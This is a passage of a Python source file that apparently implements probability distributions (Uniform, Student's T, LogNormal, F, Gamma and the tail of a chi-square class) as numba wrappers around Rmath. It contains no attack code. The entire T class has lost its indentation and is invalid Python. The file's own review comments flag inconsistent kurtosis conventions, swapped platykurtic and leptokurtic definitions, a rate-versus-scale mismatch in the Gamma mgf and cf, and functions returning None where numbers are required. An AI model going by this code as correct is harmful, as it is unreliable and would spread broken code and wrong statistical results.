        return whether every element of x is within
        the support of the distribution."""
        return 0 <= x < np.inf

    def pdf(self, x):
        """The pdf value(s) evaluated at x."""
        return chisq_pdf(self.v, x)

    def logpdf(self, x):
        """The logarithm of the pdf value(s) evaluated at x."""
        return chisq_logpdf(self.v, x)

    def loglikelihood(self, x):
        """The log-likelihood of the distribution w.r.t. all
        samples contained in array x."""
        return sum(chisq_logpdf(self.v, x))

    def cdf(self, x):
        """The cdf value(s) evaluated at x."""
        return chisq_cdf(self.v, x)

    def ccdf(self, x):
        """The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
        return chisq_ccdf(self.v, x)

    def logcdf(self, x):
        """The logarithm of the cdf value(s) evaluated at x."""
        return chisq_logcdf(self.v, x)

    def logccdf(self, x):
        """The logarithm of the complementary cdf evaluated at x."""
        return chisq_logccdf(self.v, x)

    def quantile(self, q):
        """The quantile value evaluated at q."""
        return chisq_invcdf(self.v, q)

    def cquantile(self, q):
        """The complementary quantile value evaluated at q."""
        return chisq_invccdf(self.v, q)

    def invlogcdf(self, lq):
        """The inverse function of the logcdf."""
        return chisq_invlogcdf(self.v, lq)

    def invlogccdf(self, lq):
        """The inverse function of the logccdf."""
        return chisq_invlogccdf(self.v, lq)

    # ========
    # Sampling
    # ========

    def rand(self, n):
        """Generates a vector of n independent samples from the distribution."""
        out = np.empty(n)
        # np.ndenumerate loop as in Normal.rand (nopython-compatible).
        for i, _ in np.ndenumerate(out):
            out[i] = chisq_rand(self.v)
        return out
# ============================= NEW DISTRIBUTION =================================

# Raw Rmath entry points for the continuous uniform distribution on [a, b]
# (d/p/q = density / cumulative / quantile, R naming).
dunif = _rmath_ffi.lib.dunif
punif = _rmath_ffi.lib.punif
qunif = _rmath_ffi.lib.qunif

# Elementwise wrappers; trailing int flags mirror Rmath's
# (lower_tail, give_log/log_p) arguments, as in the norm_* family.

@vectorize(nopython=True)
def unif_pdf(a, b, x):
    return dunif(x, a, b, 0)


@vectorize(nopython=True)
def unif_logpdf(a, b, x):
    return dunif(x, a, b, 1)


@vectorize(nopython=True)
def unif_cdf(a, b, x):
    return punif(x, a, b, 1, 0)


@vectorize(nopython=True)
def unif_ccdf(a, b, x):
    return punif(x, a, b, 0, 0)


@vectorize(nopython=True)
def unif_logcdf(a, b, x):
    return punif(x, a, b, 1, 1)


@vectorize(nopython=True)
def unif_logccdf(a, b, x):
    return punif(x, a, b, 0, 1)


@vectorize(nopython=True)
def unif_invcdf(a, b, q):
    return qunif(q, a, b, 1, 0)


@vectorize(nopython=True)
def unif_invccdf(a, b, q):
    return qunif(q, a, b, 0, 0)


@vectorize(nopython=True)
def unif_invlogcdf(a, b, lq):
    return qunif(lq, a, b, 1, 1)


@vectorize(nopython=True)
def unif_invlogccdf(a, b, lq):
    return qunif(lq, a, b, 0, 1)


# Scalar sampler; drawn one value at a time by Uniform.rand.
runif = _rmath_ffi.lib.runif


@jit(nopython=True)
def unif_rand(a, b):
    return runif(a, b)


# Moment generating and characteristic functions (closed forms).
# mgf has a removable singularity at x == 0, handled explicitly.
@vectorize(nopython=True)
def unif_mgf(a, b, x):
    return (np.exp(x * b) - np.exp(x * a))/(x * (b - a)) if x != 0 else 1


@vectorize(nopython=True)
def unif_cf(a, b, x):
    # NOTE(review): no x == 0 guard here, unlike unif_mgf — x = 0 divides
    # by zero (warnings are globally suppressed above); confirm intended.
    return (np.exp(1j * x * b) - np.exp(1j * x * a))/(1j * x * (b - a))

# -------------
# Uniform
# -------------

# numba jitclass field spec for Uniform below (rebinds the module-level name).
spec = [
    ('a', float32), ('b', float32)
]
# Continuous uniform distribution on [a, b], backed by the Rmath unif_*
# wrappers above.
@jitclass(spec)
class Uniform():

    # set docstring
    __doc__ = _create_class_docstr(**mtdt['Uniform'])

    def __init__(self, a, b):
        self.a, self.b = a, b

    def __str__(self):
        return "Uniform(a=%.5f, b=%.5f)" %(self.params)

    def __repr__(self):
        return self.__str__()

    # ===================
    # Parameter retrieval
    # ===================

    @property
    def params(self):
        """Return a tuple of parameters."""
        return (self.a, self.b)

    @property
    def location(self):
        """Return location parameter if exists."""
        return self.a

    @property
    def scale(self):
        """Return scale parameter if exists."""
        return self.b - self.a

    @property
    def shape(self):
        """Return shape parameter if exists."""
        return None

    # ==========
    # Statistics
    # ==========

    @property
    def mean(self):
        """Return the mean."""
        return .5 * (self.a + self.b)

    @property
    def median(self):
        """Return the median."""
        return .5 * (self.a + self.b)

    @property
    def mode(self):
        """Return the mode."""
        # The uniform distribution has no unique mode.
        return None

    @property
    def var(self):
        """Return the variance."""
        return (self.b - self.a)**2/12

    @property
    def std(self):
        """Return the standard deviation."""
        return (self.b - self.a)/np.sqrt(12)

    @property
    def skewness(self):
        """Return the skewness."""
        return 0

    @property
    def kurtosis(self):
        """Return the kurtosis."""
        # Excess-kurtosis convention (uniform excess kurtosis is -6/5).
        return -1.2

    @property
    def isplatykurtic(self):
        """Kurtosis being greater than zero."""
        # NOTE(review): naming looks swapped vs. the usual statistical
        # convention (platykurtic normally means excess kurtosis < 0);
        # behavior kept identical to the sibling classes.
        return self.kurtosis > 0

    @property
    def isleptokurtic(self):
        """Kurtosis being smaller than zero."""
        return self.kurtosis < 0

    @property
    def ismesokurtic(self):
        """Kurtosis being equal to zero."""
        return self.kurtosis == 0.0

    @property
    def entropy(self):
        """Return the entropy."""
        # Closed form: ln(b - a).
        return np.log(self.b - self.a)

    def mgf(self, x):
        """Evaluate the moment generating function at x."""
        return unif_mgf(self.a, self.b, x)

    def cf(self, x):
        """Evaluate the characteristic function at x."""
        return unif_cf(self.a, self.b, x)

    # ==========
    # Evaluation
    # ==========

    def insupport(self, x):
        """When x is a scalar, return whether x is within
        the support of the distribution. When x is an array,
        return whether every element of x is within
        the support of the distribution."""
        # BUG FIX: previously referenced bare names `a` and `b`, which are
        # undefined in this scope (NameError / numba typing error); the
        # bounds live on the instance.
        return self.a <= x < self.b

    def pdf(self, x):
        """The pdf value(s) evaluated at x."""
        return unif_pdf(self.a, self.b, x)

    def logpdf(self, x):
        """The logarithm of the pdf value(s) evaluated at x."""
        return unif_logpdf(self.a, self.b, x)

    def loglikelihood(self, x):
        """The log-likelihood of the distribution w.r.t. all
        samples contained in array x."""
        return sum(unif_logpdf(self.a, self.b, x))

    def cdf(self, x):
        """The cdf value(s) evaluated at x."""
        return unif_cdf(self.a, self.b, x)

    def ccdf(self, x):
        """The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
        return unif_ccdf(self.a, self.b, x)

    def logcdf(self, x):
        """The logarithm of the cdf value(s) evaluated at x."""
        return unif_logcdf(self.a, self.b, x)

    def logccdf(self, x):
        """The logarithm of the complementary cdf evaluated at x."""
        return unif_logccdf(self.a, self.b, x)

    def quantile(self, q):
        """The quantile value evaluated at q."""
        return unif_invcdf(self.a, self.b, q)

    def cquantile(self, q):
        """The complementary quantile value evaluated at q."""
        return unif_invccdf(self.a, self.b, q)

    def invlogcdf(self, lq):
        """The inverse function of the logcdf."""
        return unif_invlogcdf(self.a, self.b, lq)

    def invlogccdf(self, lq):
        """The inverse function of the logccdf."""
        return unif_invlogccdf(self.a, self.b, lq)

    # ========
    # Sampling
    # ========

    def rand(self, n):
        """Generates a vector of n independent samples from the distribution."""
        out = np.empty(n)
        # np.ndenumerate loop as in Normal.rand (nopython-compatible).
        for i, _ in np.ndenumerate(out):
            out[i] = unif_rand(self.a, self.b)
        return out
# ============================= NEW DISTRIBUTION =================================

# Raw Rmath entry points for Student's t distribution with v degrees of
# freedom (d/p/q = density / cumulative / quantile, R naming).
dt = _rmath_ffi.lib.dt
pt = _rmath_ffi.lib.pt
qt = _rmath_ffi.lib.qt

# Elementwise wrappers; trailing int flags mirror Rmath's
# (lower_tail, give_log/log_p) arguments, as in the norm_* family.

@vectorize(nopython=True)
def tdist_pdf(v, x):
    return dt(x, v, 0)


@vectorize(nopython=True)
def tdist_logpdf(v, x):
    return dt(x, v, 1)


@vectorize(nopython=True)
def tdist_cdf(v, x):
    return pt(x, v, 1, 0)


@vectorize(nopython=True)
def tdist_ccdf(v, x):
    return pt(x, v, 0, 0)


@vectorize(nopython=True)
def tdist_logcdf(v, x):
    return pt(x, v, 1, 1)


@vectorize(nopython=True)
def tdist_logccdf(v, x):
    return pt(x, v, 0, 1)


@vectorize(nopython=True)
def tdist_invcdf(v, q):
    return qt(q, v, 1, 0)


@vectorize(nopython=True)
def tdist_invccdf(v, q):
    return qt(q, v, 0, 0)


@vectorize(nopython=True)
def tdist_invlogcdf(v, lq):
    return qt(lq, v, 1, 1)


@vectorize(nopython=True)
def tdist_invlogccdf(v, lq):
    return qt(lq, v, 0, 1)


# Scalar sampler; drawn one value at a time by T.rand.
rt = _rmath_ffi.lib.rt


@jit(nopython=True)
def tdist_rand(v):
    return rt(v)


@vectorize(nopython=True)
def tdist_mgf(v, x):
    # The t distribution has no moment generating function.
    # NOTE(review): returning None from a nopython @vectorize is dubious —
    # numba ufuncs need a numeric return; confirm this is never invoked.
    return None


@vectorize(nopython=True)
def tdist_cf(v, x):
    # Characteristic function in terms of the modified Bessel function K.
    return bessel_k(v/2, np.sqrt(v)*abs(x))*(np.sqrt(v)*abs(x))**(v/2)/ (gamma(v/2)*2**(v/2 - 1))

# -------------
# T
# -------------

# numba jitclass field spec for T below (rebinds the module-level name).
spec = [
    ('v', int32)
]
@jitclass(spec)
class T():
# set docstring
__doc__ = _create_class_docstr(**mtdt['T'])
def __init__(self, v):
self.v = v
def __str__(self):
return "T(df=%.5f)" %(self.params)
def __repr__(self):
return self.__str__()
# ===================
# Parameter retrieval
# ===================
@property
def params(self):
"""Return a tuple of parameters."""
return (self.v)
@property
def location(self):
"""Return location parameter if exists."""
return None
@property
def scale(self):
"""Return scale parameter if exists."""
return None
@property
def shape(self):
"""Return shape parameter if exists."""
return self.v
# ==========
# Statistics
# ==========
@property
def mean(self):
"""Return the mean."""
return 0
@property
def median(self):
"""Return the median."""
return 0
@property
def mode(self):
"""Return the mode."""
return 0
@property
def var(self):
"""Return the variance."""
return self.v/(self.v - 2) if self.v > 2 else np.inf
@property
def std(self):
"""Return the standard deviation."""
return np.sqrt(self.v/(self.v - 2)) if self.v > 2 else np.inf
@property
def skewness(self):
"""Return the skewness."""
return 0 if self.v > 3 else None
@property
def kurtosis(self):
"""Return the kurtosis."""
return 6/(self.v - 4) if self.v > 4 else np.inf
@property
def isplatykurtic(self):
"""Kurtosis being greater than zero."""
return self.kurtosis > 0
@property
def isleptokurtic(self):
"""Kurtosis being smaller than zero."""
return self.kurtosis < 0
@property
def ismesokurtic(self):
"""Kurtosis being equal to zero."""
return self.kurtosis == 0.0
@property
def entropy(self):
"""Return the entropy."""
return .5*(self.v + 1)*(digamma(.5*(self.v + 1)) - digamma(.5*self.v)) + np.log(np.sqrt(self.v) * beta(.5*self.v, .5))
def mgf(self, x):
"""Evaluate the moment generating function at x."""
return tdist_mgf(self.v, x)
def cf(self, x):
"""Evaluate the characteristic function at x."""
return tdist_cf(self.v, x)
# ==========
# Evaluation
# ==========
def insupport(self, x):
"""When x is a scalar, return whether x is within
the support of the distribution. When x is an array,
return whether every element of x is within
the support of the distribution."""
return -np.inf <= x < np.inf
def pdf(self, x):
"""The pdf value(s) evaluated at x."""
return tdist_pdf(self.v, x)
def logpdf(self, x):
"""The logarithm of the pdf value(s) evaluated at x."""
return tdist_logpdf(self.v, x)
def loglikelihood(self, x):
"""The log-likelihood of the distribution w.r.t. all
samples contained in array x."""
return sum(tdist_logpdf(self.v, x))
def cdf(self, x):
"""The cdf value(s) evaluated at x."""
return tdist_cdf(self.v, x)
def ccdf(self, x):
"""The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
return tdist_ccdf(self.v, x)
def logcdf(self, x):
"""The logarithm of the cdf value(s) evaluated at x."""
return tdist_logcdf(self.v, x)
def logccdf(self, x):
"""The logarithm of the complementary cdf evaluated at x."""
return tdist_logccdf(self.v, x)
def quantile(self, q):
"""The quantile value evaluated at q."""
return tdist_invcdf(self.v, q)
def cquantile(self, q):
"""The complementary quantile value evaluated at q."""
return tdist_invccdf(self.v, q)
def invlogcdf(self, lq):
"""The inverse function of the logcdf."""
return tdist_invlogcdf(self.v, lq)
def invlogccdf(self, lq):
"""The inverse function of the logccdf."""
return tdist_invlogccdf(self.v, lq)
# ========
# Sampling
# ========
def rand(self, n):
"""Generates a vector of n independent samples from the distribution."""
out = np.empty(n)
for i, _ in np.ndenumerate(out):
out[i] = tdist_rand(self.v)
return out
# ============================= NEW DISTRIBUTION =================================
# Log-normal: numba-vectorized wrappers around Rmath dlnorm/plnorm/qlnorm.
# Trailing int arguments follow the Rmath convention: `lower_tail`, `log_p`.
dlnorm = _rmath_ffi.lib.dlnorm
plnorm = _rmath_ffi.lib.plnorm
qlnorm = _rmath_ffi.lib.qlnorm
@vectorize(nopython=True)
def lognormal_pdf(mu, sigma, x):
    return dlnorm(x, mu, sigma, 0)
@vectorize(nopython=True)
def lognormal_logpdf(mu, sigma, x):
    return dlnorm(x, mu, sigma, 1)
@vectorize(nopython=True)
def lognormal_cdf(mu, sigma, x):
    return plnorm(x, mu, sigma, 1, 0)
@vectorize(nopython=True)
def lognormal_ccdf(mu, sigma, x):
    return plnorm(x, mu, sigma, 0, 0)
@vectorize(nopython=True)
def lognormal_logcdf(mu, sigma, x):
    return plnorm(x, mu, sigma, 1, 1)
@vectorize(nopython=True)
def lognormal_logccdf(mu, sigma, x):
    return plnorm(x, mu, sigma, 0, 1)
@vectorize(nopython=True)
def lognormal_invcdf(mu, sigma, q):
    return qlnorm(q, mu, sigma, 1, 0)
@vectorize(nopython=True)
def lognormal_invccdf(mu, sigma, q):
    return qlnorm(q, mu, sigma, 0, 0)
@vectorize(nopython=True)
def lognormal_invlogcdf(mu, sigma, lq):
    return qlnorm(lq, mu, sigma, 1, 1)
@vectorize(nopython=True)
def lognormal_invlogccdf(mu, sigma, lq):
    return qlnorm(lq, mu, sigma, 0, 1)
rlnorm = _rmath_ffi.lib.rlnorm
@jit(nopython=True)
def lognormal_rand(mu, sigma):
    # one draw using Rmath's RNG state
    return rlnorm(mu, sigma)
@vectorize(nopython=True)
def lnorm_mgf(mu, sigma, x):
    # The log-normal MGF diverges for x > 0 and has no closed form.
    # NOTE(review): returning None from a nopython-vectorized function looks
    # dubious -- confirm this is never actually evaluated.
    return None
@vectorize(nopython=True)
def lnorm_cf(mu, sigma, x):
    # No closed-form characteristic function is implemented.
    return None
# -------------
# LogNormal
# -------------
spec = [
    ('mu', float32), ('sigma', float32)
]
@jitclass(spec)
class LogNormal():
    # Log-normal distribution: log(X) ~ Normal(mu, sigma).
    # set docstring
    __doc__ = _create_class_docstr(**mtdt['LogNormal'])
    def __init__(self, mu, sigma):
        self.mu, self.sigma = mu, sigma
    def __str__(self):
        return "LogNormal(mu=%.5f, sigma=%.5f)" %(self.params)
    def __repr__(self):
        return self.__str__()
    # ===================
    # Parameter retrieval
    # ===================
    @property
    def params(self):
        """Return a tuple of parameters."""
        return (self.mu, self.sigma)
    @property
    def location(self):
        """Return location parameter if exists."""
        return self.mu
    @property
    def scale(self):
        """Return scale parameter if exists."""
        return self.sigma
    @property
    def shape(self):
        """Return shape parameter if exists."""
        return None
    # ==========
    # Statistics
    # ==========
    @property
    def mean(self):
        """Return the mean."""
        return np.exp(self.mu + .5* self.sigma**2)
    @property
    def median(self):
        """Return the median."""
        return np.exp(self.mu)
    @property
    def mode(self):
        """Return the mode."""
        return np.exp(self.mu - self.sigma**2)
    @property
    def var(self):
        """Return the variance."""
        return (np.exp(self.sigma**2) - 1) * np.exp(2*self.mu + self.sigma**2)
    @property
    def std(self):
        """Return the standard deviation."""
        return np.sqrt(self.var)
    @property
    def skewness(self):
        """Return the skewness."""
        return (np.exp(self.sigma**2) + 2) * np.sqrt(np.exp(self.sigma**2) - 1)
    @property
    def kurtosis(self):
        """Return the kurtosis."""
        # Fixed: the trailing constant was -6 (the *excess* kurtosis); this
        # module's convention is full kurtosis (3 + excess), hence -3.
        return np.exp(4*self.sigma**2) + 2*np.exp(3*self.sigma**2) + 3*np.exp(2*self.sigma**2) - 3
    @property
    def isplatykurtic(self):
        """Kurtosis being greater than zero."""
        return self.kurtosis > 0
    @property
    def isleptokurtic(self):
        """Kurtosis being smaller than zero."""
        return self.kurtosis < 0
    @property
    def ismesokurtic(self):
        """Kurtosis being equal to zero."""
        return self.kurtosis == 0.0
    @property
    def entropy(self):
        """Return the entropy."""
        # ln(sigma * e^{mu + 1/2} * sqrt(2*pi))
        return np.log(self.sigma*np.exp(self.mu + .5)*np.sqrt(2*np.pi))
    def mgf(self, x):
        """Evaluate the moment generating function at x."""
        return lnorm_mgf(self.mu, self.sigma, x)
    def cf(self, x):
        """Evaluate the characteristic function at x."""
        return lnorm_cf(self.mu, self.sigma, x)
    # ==========
    # Evaluation
    # ==========
    def insupport(self, x):
        """When x is a scalar, return whether x is within
        the support of the distribution. When x is an array,
        return whether every element of x is within
        the support of the distribution."""
        return 0 < x < np.inf
    def pdf(self, x):
        """The pdf value(s) evaluated at x."""
        return lognormal_pdf(self.mu, self.sigma, x)
    def logpdf(self, x):
        """The logarithm of the pdf value(s) evaluated at x."""
        return lognormal_logpdf(self.mu, self.sigma, x)
    def loglikelihood(self, x):
        """The log-likelihood of the distribution w.r.t. all
        samples contained in array x."""
        return sum(lognormal_logpdf(self.mu, self.sigma, x))
    def cdf(self, x):
        """The cdf value(s) evaluated at x."""
        return lognormal_cdf(self.mu, self.sigma, x)
    def ccdf(self, x):
        """The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
        return lognormal_ccdf(self.mu, self.sigma, x)
    def logcdf(self, x):
        """The logarithm of the cdf value(s) evaluated at x."""
        return lognormal_logcdf(self.mu, self.sigma, x)
    def logccdf(self, x):
        """The logarithm of the complementary cdf evaluated at x."""
        return lognormal_logccdf(self.mu, self.sigma, x)
    def quantile(self, q):
        """The quantile value evaluated at q."""
        return lognormal_invcdf(self.mu, self.sigma, q)
    def cquantile(self, q):
        """The complementary quantile value evaluated at q."""
        return lognormal_invccdf(self.mu, self.sigma, q)
    def invlogcdf(self, lq):
        """The inverse function of the logcdf."""
        return lognormal_invlogcdf(self.mu, self.sigma, lq)
    def invlogccdf(self, lq):
        """The inverse function of the logccdf."""
        return lognormal_invlogccdf(self.mu, self.sigma, lq)
    # ========
    # Sampling
    # ========
    def rand(self, n):
        """Generates a vector of n independent samples from the distribution."""
        out = np.empty(n)
        for i, _ in np.ndenumerate(out):
            out[i] = lognormal_rand(self.mu, self.sigma)
        return out
# ============================= NEW DISTRIBUTION =================================
# F distribution: numba-vectorized wrappers around Rmath df/pf/qf with
# numerator/denominator degrees of freedom (v1, v2).
# Trailing int arguments follow the Rmath convention: `lower_tail`, `log_p`.
df = _rmath_ffi.lib.df
pf = _rmath_ffi.lib.pf
qf = _rmath_ffi.lib.qf
@vectorize(nopython=True)
def fdist_pdf(v1, v2, x):
    return df(x, v1, v2, 0)
@vectorize(nopython=True)
def fdist_logpdf(v1, v2, x):
    return df(x, v1, v2, 1)
@vectorize(nopython=True)
def fdist_cdf(v1, v2, x):
    return pf(x, v1, v2, 1, 0)
@vectorize(nopython=True)
def fdist_ccdf(v1, v2, x):
    return pf(x, v1, v2, 0, 0)
@vectorize(nopython=True)
def fdist_logcdf(v1, v2, x):
    return pf(x, v1, v2, 1, 1)
@vectorize(nopython=True)
def fdist_logccdf(v1, v2, x):
    return pf(x, v1, v2, 0, 1)
@vectorize(nopython=True)
def fdist_invcdf(v1, v2, q):
    return qf(q, v1, v2, 1, 0)
@vectorize(nopython=True)
def fdist_invccdf(v1, v2, q):
    return qf(q, v1, v2, 0, 0)
@vectorize(nopython=True)
def fdist_invlogcdf(v1, v2, lq):
    return qf(lq, v1, v2, 1, 1)
@vectorize(nopython=True)
def fdist_invlogccdf(v1, v2, lq):
    return qf(lq, v1, v2, 0, 1)
rf = _rmath_ffi.lib.rf
@jit(nopython=True)
def fdist_rand(v1, v2):
    # one draw using Rmath's RNG state
    return rf(v1, v2)
@vectorize(nopython=True)
def fdist_mgf(v1, v2, x):
    # The F distribution has no moment generating function.
    # NOTE(review): returning None from a nopython-vectorized function looks
    # dubious -- confirm this is never actually evaluated.
    return None
@vectorize(nopython=True)
def fdist_cf(v1, v2, x):
    # No closed-form characteristic function is implemented.
    return None
# -------------
# F
# -------------
spec = [
    ('v1', float32), ('v2', float32)
]
@jitclass(spec)
class F():
    # Fisher-Snedecor F distribution with (v1, v2) degrees of freedom.
    # set docstring
    __doc__ = _create_class_docstr(**mtdt['F'])
    def __init__(self, v1, v2):
        self.v1, self.v2 = v1, v2
    def __str__(self):
        return "F(d1=%.5f, d2=%.5f)" %(self.params)
    def __repr__(self):
        return self.__str__()
    # ===================
    # Parameter retrieval
    # ===================
    @property
    def params(self):
        """Return a tuple of parameters."""
        return (self.v1, self.v2)
    @property
    def location(self):
        """Return location parameter if exists."""
        return None
    @property
    def scale(self):
        """Return scale parameter if exists."""
        return None
    @property
    def shape(self):
        """Return shape parameter if exists."""
        return (self.v1, self.v2)
    # ==========
    # Statistics
    # ==========
    @property
    def mean(self):
        """Return the mean."""
        # finite only for v2 > 2
        return self.v2/(self.v2 - 2) if self.v2 > 2 else np.inf
    @property
    def median(self):
        """Return the median."""
        # no closed form
        return None
    @property
    def mode(self):
        """Return the mode."""
        return (self.v1 - 2)/self.v1 * self.v2/(self.v2 + 2) if self.v1 > 2 else np.inf
    @property
    def var(self):
        """Return the variance."""
        return 2*self.v2**2*(self.v1 + self.v2 - 2)/ (self.v1*(self.v2 - 2)**2*(self.v2 - 4)) if self.v2 > 4 else np.inf
    @property
    def std(self):
        """Return the standard deviation."""
        return np.sqrt(self.var)
    @property
    def skewness(self):
        """Return the skewness."""
        return (2*self.v1 + self.v2 - 2)*np.sqrt(8*(self.v2 - 4))/ ((self.v2 - 6)*np.sqrt(self.v1*(self.v1+self.v2-2))) if self.v2 > 6 else np.inf
    @property
    def kurtosis(self):
        """Return the kurtosis."""
        # Guard added: kurtosis exists only for v2 > 8; the denominator contains
        # (v2 - 6)*(v2 - 8), which the old code divided by unconditionally.
        return 3 + 12*(self.v1*(5*self.v2 - 22)*(self.v1+self.v2-2) + (self.v2 - 4)*(self.v2 - 2)**2)/ (self.v1*(self.v2-6)*(self.v2-8)*(self.v1+self.v2-2)) if self.v2 > 8 else np.inf
    @property
    def isplatykurtic(self):
        """Kurtosis being greater than zero."""
        return self.kurtosis > 0
    @property
    def isleptokurtic(self):
        """Kurtosis being smaller than zero."""
        return self.kurtosis < 0
    @property
    def ismesokurtic(self):
        """Kurtosis being equal to zero."""
        return self.kurtosis == 0.0
    @property
    def entropy(self):
        """Return the entropy."""
        # not implemented
        return None
    def mgf(self, x):
        """Evaluate the moment generating function at x."""
        return fdist_mgf(self.v1, self.v2, x)
    def cf(self, x):
        """Evaluate the characteristic function at x."""
        return fdist_cf(self.v1, self.v2, x)
    # ==========
    # Evaluation
    # ==========
    def insupport(self, x):
        """When x is a scalar, return whether x is within
        the support of the distribution. When x is an array,
        return whether every element of x is within
        the support of the distribution."""
        return 0 <= x < np.inf
    def pdf(self, x):
        """The pdf value(s) evaluated at x."""
        return fdist_pdf(self.v1, self.v2, x)
    def logpdf(self, x):
        """The logarithm of the pdf value(s) evaluated at x."""
        return fdist_logpdf(self.v1, self.v2, x)
    def loglikelihood(self, x):
        """The log-likelihood of the distribution w.r.t. all
        samples contained in array x."""
        return sum(fdist_logpdf(self.v1, self.v2, x))
    def cdf(self, x):
        """The cdf value(s) evaluated at x."""
        return fdist_cdf(self.v1, self.v2, x)
    def ccdf(self, x):
        """The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
        return fdist_ccdf(self.v1, self.v2, x)
    def logcdf(self, x):
        """The logarithm of the cdf value(s) evaluated at x."""
        return fdist_logcdf(self.v1, self.v2, x)
    def logccdf(self, x):
        """The logarithm of the complementary cdf evaluated at x."""
        return fdist_logccdf(self.v1, self.v2, x)
    def quantile(self, q):
        """The quantile value evaluated at q."""
        return fdist_invcdf(self.v1, self.v2, q)
    def cquantile(self, q):
        """The complementary quantile value evaluated at q."""
        return fdist_invccdf(self.v1, self.v2, q)
    def invlogcdf(self, lq):
        """The inverse function of the logcdf."""
        return fdist_invlogcdf(self.v1, self.v2, lq)
    def invlogccdf(self, lq):
        """The inverse function of the logccdf."""
        return fdist_invlogccdf(self.v1, self.v2, lq)
    # ========
    # Sampling
    # ========
    def rand(self, n):
        """Generates a vector of n independent samples from the distribution."""
        out = np.empty(n)
        for i, _ in np.ndenumerate(out):
            out[i] = fdist_rand(self.v1, self.v2)
        return out
# ============================= NEW DISTRIBUTION =================================
# Gamma: numba-vectorized wrappers around Rmath dgamma/pgamma/qgamma.
# Trailing int arguments follow the Rmath convention: `lower_tail`, `log_p`.
dgamma = _rmath_ffi.lib.dgamma
pgamma = _rmath_ffi.lib.pgamma
qgamma = _rmath_ffi.lib.qgamma
@vectorize(nopython=True)
def gamma_pdf(alpha, beta, x):
    return dgamma(x, alpha, beta, 0)
@vectorize(nopython=True)
def gamma_logpdf(alpha, beta, x):
    return dgamma(x, alpha, beta, 1)
@vectorize(nopython=True)
def gamma_cdf(alpha, beta, x):
    return pgamma(x, alpha, beta, 1, 0)
@vectorize(nopython=True)
def gamma_ccdf(alpha, beta, x):
    return pgamma(x, alpha, beta, 0, 0)
@vectorize(nopython=True)
def gamma_logcdf(alpha, beta, x):
    return pgamma(x, alpha, beta, 1, 1)
@vectorize(nopython=True)
def gamma_logccdf(alpha, beta, x):
    return pgamma(x, alpha, beta, 0, 1)
@vectorize(nopython=True)
def gamma_invcdf(alpha, beta, q):
    return qgamma(q, alpha, beta, 1, 0)
@vectorize(nopython=True)
def gamma_invccdf(alpha, beta, q):
    return qgamma(q, alpha, beta, 0, 0)
@vectorize(nopython=True)
def gamma_invlogcdf(alpha, beta, lq):
    return qgamma(lq, alpha, beta, 1, 1)
@vectorize(nopython=True)
def gamma_invlogccdf(alpha, beta, lq):
    return qgamma(lq, alpha, beta, 0, 1)
rgamma = _rmath_ffi.lib.rgamma
@jit(nopython=True)
def gamma_rand(alpha, beta):
    # one draw using Rmath's RNG state
    return rgamma(alpha, beta)
@vectorize(nopython=True)
def gamma_mgf(alpha, beta, x):
    # NOTE(review): this formula treats `beta` as a *rate* (valid for x < beta),
    # while the Gamma class statistics (mean = alpha*beta) treat `beta` as a
    # *scale* -- confirm against the Rmath dgamma(x, shape, scale) convention.
    return (1 - x/beta)**(-alpha) if x < beta else None
@vectorize(nopython=True)
def gamma_cf(alpha, beta, x):
    # NOTE(review): same rate-vs-scale concern as gamma_mgf above.
    return (1 - (1j * x)/beta)**(-alpha)
# -------------
# Gamma
# -------------
spec = [
    ('alpha', float32), ('beta', float32)
]
@jitclass(spec)
class Gamma():
    # Gamma distribution with shape `alpha` and scale `beta`
    # (mean = alpha*beta, var = alpha*beta**2).
    # set docstring
    __doc__ = _create_class_docstr(**mtdt['Gamma'])
    def __init__(self, alpha, beta):
        self.alpha, self.beta = alpha, beta
    def __str__(self):
        return "Gamma(alpha=%.5f, beta=%.5f)" %(self.params)
    def __repr__(self):
        return self.__str__()
    # ===================
    # Parameter retrieval
    # ===================
    @property
    def params(self):
        """Return a tuple of parameters."""
        return (self.alpha, self.beta)
    @property
    def location(self):
        """Return location parameter if exists."""
        return None
    @property
    def scale(self):
        """Return scale parameter if exists."""
        return self.beta
    @property
    def shape(self):
        """Return shape parameter if exists."""
        return self.alpha
    # ==========
    # Statistics
    # ==========
    @property
    def mean(self):
        """Return the mean."""
        return self.alpha*self.beta
    @property
    def median(self):
        """Return the median."""
        # no closed form
        return None
    @property
    def mode(self):
        """Return the mode."""
        return (self.alpha - 1) * self.beta if self.alpha >= 1 else None
    @property
    def var(self):
        """Return the variance."""
        return self.alpha * (self.beta**2)
    @property
    def std(self):
        """Return the standard deviation."""
        return np.sqrt(self.var)
    @property
    def skewness(self):
        """Return the skewness."""
        return 2/(np.sqrt(self.alpha))
    @property
    def kurtosis(self):
        """Return the kurtosis."""
        # full kurtosis (3 + excess)
        return 3 + 6/self.alpha
    @property
    def isplatykurtic(self):
        """Kurtosis being greater than zero."""
        return self.kurtosis > 0
    @property
    def isleptokurtic(self):
        """Kurtosis being smaller than zero."""
        return self.kurtosis < 0
    @property
    def ismesokurtic(self):
        """Kurtosis being equal to zero."""
        return self.kurtosis == 0.0
    @property
    def entropy(self):
        """Return the entropy."""
        # Fixed sign: with `beta` a scale parameter (see mean/var above), the
        # differential entropy is alpha + ln(beta) + ln(Gamma(alpha))
        # + (1 - alpha)*digamma(alpha); the old code subtracted ln(beta),
        # which is the rate-parametrization form.
        return self.alpha + np.log(self.beta) + np.log(gamma(self.alpha)) + (1 - self.alpha)*digamma(self.alpha)
    def mgf(self, x):
        """Evaluate the moment generating function at x."""
        return gamma_mgf(self.alpha, self.beta, x)
    def cf(self, x):
        """Evaluate the characteristic function at x."""
        return gamma_cf(self.alpha, self.beta, x)
    # ==========
    # Evaluation
    # ==========
    def insupport(self, x):
        """When x is a scalar, return whether x is within
        the support of the distribution. When x is an array,
        return whether every element of x is within
        the support of the distribution."""
        return 0 < x < np.inf
    def pdf(self, x):
        """The pdf value(s) evaluated at x."""
        return gamma_pdf(self.alpha, self.beta, x)
    def logpdf(self, x):
        """The logarithm of the pdf value(s) evaluated at x."""
        return gamma_logpdf(self.alpha, self.beta, x)
    def loglikelihood(self, x):
        """The log-likelihood of the distribution w.r.t. all
        samples contained in array x."""
        return sum(gamma_logpdf(self.alpha, self.beta, x))
    def cdf(self, x):
        """The cdf value(s) evaluated at x."""
        return gamma_cdf(self.alpha, self.beta, x)
    def ccdf(self, x):
